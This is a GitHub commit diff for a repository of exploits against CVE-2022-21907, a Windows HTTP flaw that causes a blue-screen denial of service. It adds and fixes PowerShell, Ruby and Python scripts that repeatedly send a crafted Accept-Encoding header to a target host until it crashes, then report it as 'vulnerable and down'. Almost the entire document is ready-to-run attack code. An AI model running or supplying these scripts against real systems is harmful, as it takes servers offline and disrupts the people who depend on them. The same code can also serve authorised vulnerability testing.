[1.0.0] Metasploit, NMAP modules and pure ruby script

- Fix: some error in python and powershell exploit
mauricelambert · Mar 5, 2022 · d6110d7 · d6110d7
1 parent c4979f2
commit d6110d7
Show file tree

Hide file tree

Showing 8 changed files with 671 additions and 24 deletions.
diff --git a/CVE-2022-21907.ps1 b/CVE-2022-21907.ps1
@@ -1,4 +1,4 @@
-###################
+###################
 #    This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
 #    Copyright (C) 2022  Maurice Lambert
 
@@ -30,7 +30,7 @@ This is free software, and you are welcome to redistribute it
 under certain conditions. 
 "@
 
-write $copyright
+write "`n$copyright`n"
 
 $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
 $session.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62"
@@ -55,5 +55,9 @@ $headers = @{
 
 $ErrorActionPreference="Stop"
 while(1) {
-    Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers
+	try {
+		Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers -TimeoutSec 10
+	} catch {
+		break
+	}
 }
diff --git a/CVE-2022-21907.rb b/CVE-2022-21907.rb
@@ -0,0 +1,161 @@
+#!/usr/bin/env ruby
+# frozen_string_literal: true
+
+##
+# This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
+# attack (Blue Screen).
+
+###################
+#    This script exploit the CVE-2022-21907 for a DOS attack.
+#    Copyright (C) 2022  Maurice Lambert
+
+#    This program is free software: you can redistribute it and/or modify
+#    it under the terms of the GNU General Public License as published by
+#    the Free Software Foundation, either version 3 of the License, or
+#    (at your option) any later version.
+
+#    This program is distributed in the hope that it will be useful,
+#    but WITHOUT ANY WARRANTY; without even the implied warranty of
+#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#    GNU General Public License for more details.
+
+#    You should have received a copy of the GNU General Public License
+#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
+###################
+
+##
+# Project version
+VERSION = '1.0.0'
+
+##
+# Project author
+AUTHOR = 'Maurice Lambert'
+
+##
+# E-mail of the author of the project
+AUTHOR_EMAIL = 'mauricelambert434@gmail.com'
+
+##
+# Project maintainer
+MAINTAINER = 'Maurice Lambert'
+
+##
+# E-mail of the maintainer of the project
+MAINTAINER_EMAIL = 'mauricelambert434@gmail.com'
+
+##
+# Project description
+DESCRIPTION = '
+This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
+attack (Blue Screen).
+'
+
+##
+# Project license
+LICENSE = 'GPL-3.0 License'
+
+##
+# Project url
+URL = 'https://github.com/mauricelambert/CVE-2022-21907'
+
+##
+# Project copyright
+COPYRIGHT = '
+CVE-2022-21907  Copyright (C) 2022  Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions.
+'
+
+puts "#{COPYRIGHT}\n"
+
+require 'net/http'
+
+##
+# This class implements methods to exploit
+# the CVE-2022-21907 for a DOS (Denial of Service)
+# attack (Blue Screen) with ruby.
+class CVE202221907
+  ##
+  # This function gets target host from the STDIN
+
+  def self.get_stdin_host
+    print 'Host (target): '
+    gets.strip
+  end
+
+  ##
+  # This function generates a random string
+
+  def self.generate_random_string(size)
+    upper_characters = Array('A'..'Z')
+    Array.new(size) { upper_characters.sample }.join
+  end
+
+  ##
+  # This function generates a random payload
+
+  def self.generate_encoding_payload
+    "#{generate_random_string(24)},#{generate_random_string(60)}&" \
+      "#{generate_random_string(2)}&**" \
+      "#{generate_random_string(20)}**#{Array('A'..'Z').sample}," \
+      "#{generate_random_string(73)},#{generate_random_string(71)}" \
+      ",#{generate_random_string(27)},****************************" \
+      "#{generate_random_string(6)}, *, ,"
+  end
+
+  ##
+  # This function checks the target state
+
+  def self.check_up(request, uri)
+    res = Net::HTTP.start(
+      uri.hostname, uri.port,
+      read_timeout: 60,
+      open_timeout: 60,
+      use_ssl: uri.scheme == 'https'
+    ) { |http| http.request(request) }
+  rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError
+    puts '[!] This host is probably inaccessible'
+    2
+  else
+    nil
+  end
+
+  ##
+  # The main function to launch the attack
+
+  def self.main
+    host = ARGV[0] || get_stdin_host
+
+    uri = URI("http://#{host}")
+    request = Net::HTTP::Get.new(uri)
+
+    access_error = check_up(request, uri)
+    return access_error if access_error
+
+    request['Accept-Encoding'] = generate_encoding_payload
+    vulnerable = false
+
+    10.times do
+      Net::HTTP.start(
+        uri.hostname, uri.port,
+        read_timeout: 10,
+        open_timeout: 10,
+        use_ssl: uri.scheme == 'https'
+      ) { |http| http.request(request) }
+    rescue Net::OpenTimeout, Errno::ETIMEDOUT
+      vulnerable = true
+      break
+    end
+
+    if vulnerable
+      puts "[+] Target: #{host} is vulnerable and down."
+      0
+    else
+      puts "[-] Target: #{host} is not vulnerable and up."
+      1
+    end
+  end
+end
+
+exit(CVE202221907.main) if __FILE__ == $PROGRAM_NAME
diff --git a/CVE202221907.py b/CVE202221907.py
@@ -51,35 +51,40 @@
 
 print(copyright)
 
+from urllib.error import URLError, HTTPError
 from urllib.request import Request, urlopen
-from sys import exit, stderr
+from sys import exit, stderr, argv
+from socket import timeout
 
-host = input("Target: ")
+host = argv[1] if len(argv) == 2 else input("Target: ")
 
 headers = {
-    "Accept-Encoding": 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
+    "Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,"
 }
 
 try:
-    response  = urlopen(f"http://{host}")
-except (URLError, HTTPError) as e:
+    urlopen(f"http://{host}")
+except HTTPError:
     pass
 except Exception as e:
-    print(f"http://{host} is not DOWN.")
-    print(f"{e.__class__}: {e}", file = stderr)
+    print(f"[!] http://{host} is not UP (get no response).")
+    print(f"{e.__class__.__name__}: {e}", file=stderr)
     exit(1)
 
-print(f"http://{host} is not UP. Start hacking...")
+print(f"[+] http://{host} is UP. Send payload...")
 
 while True:
     try:
-        response  = urlopen(Request(f"http://{host}", headers=headers))
-    except TimeoutError as e:
-    	print(f"http://{host} is not DOWN. {host} is vulnerable to CVE-2022-21907.")
-    	exit(0)
-    except (URLError, HTTPError) as e:
-    	pass
+        urlopen(Request(f"http://{host}", headers=headers))
+    except (timeout, TimeoutError, URLError):
+        print(
+            f"[+] http://{host} is DOWN. {host} is vulnerable to CVE-2022-21907."
+        )
+        exit(0)
+    except HTTPError:
+        pass
     except Exception as e:
-        print(f"{e.__class__}: {e}")
+        print(f"{e.__class__.__name__}: {e}", file=stderr)
 
-    print(f"Payload sent successfully. Try new request...")
+    print("[!] Host is up.", file=stderr)
+    print("[+] Payload sent successfully. Try new request...")